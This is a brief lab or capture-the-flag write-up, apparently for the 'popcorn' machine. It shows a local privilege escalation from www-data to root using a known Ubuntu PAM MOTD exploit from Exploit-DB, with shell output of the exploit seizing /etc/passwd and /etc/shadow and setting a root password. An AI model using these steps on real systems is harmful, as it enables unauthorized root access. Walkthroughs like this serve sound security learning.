4 manual privesc > root
www-data@popcorn:/home/george$ find . -type f -ls
76 4 -rw-r--r-- 1 george george 220 Mar 17 2017 ./.bash_logout
82 4 -rw-r--r-- 1 george george 3180 Mar 17 2017 ./.bashrc
42885 832 -rw-r--r-- 1 george george 848727 Mar 17 2017 ./torrenthoster.zip
42883 0 -rw-r--r-- 1 george george 0 Mar 17 2017 ./.cache/motd.legal-displayed
42884 0 -rw-r--r-- 1 george george 0 Mar 17 2017 ./.sudo_as_admin_successful
2210 4 -rw-r--r-- 1 george george 33 Sep 10 00:32 ./user.txt
43648 4 -rw------- 1 root root 19 May 5 2017 ./.nano_history
44232 4 -rw------- 1 root root 1571 Mar 17 2017 ./.mysql_history
107 4 -rw-r--r-- 1 george george 675 Mar 17 2017 ./.profile
# file .cache/motd.legal-displayed is empty but never seen it before
Using https://www.exploit-db.com/exploits/14339
# had a lot of issues
www-data@popcorn:/var/www/torrent$ bash pam.sh
[*] Ubuntu PAM MOTD local root
'am.sh: line 39: syntax error near unexpected token `{
'am.sh: line 39: `backup() {
# running dos2unix
$ dos2unix 14339
dos2unix: converting file 14339 to Unix format...
www-data@popcorn:/var/www/torrent$ bash k.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password:
root@popcorn:/var/www/torrent# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated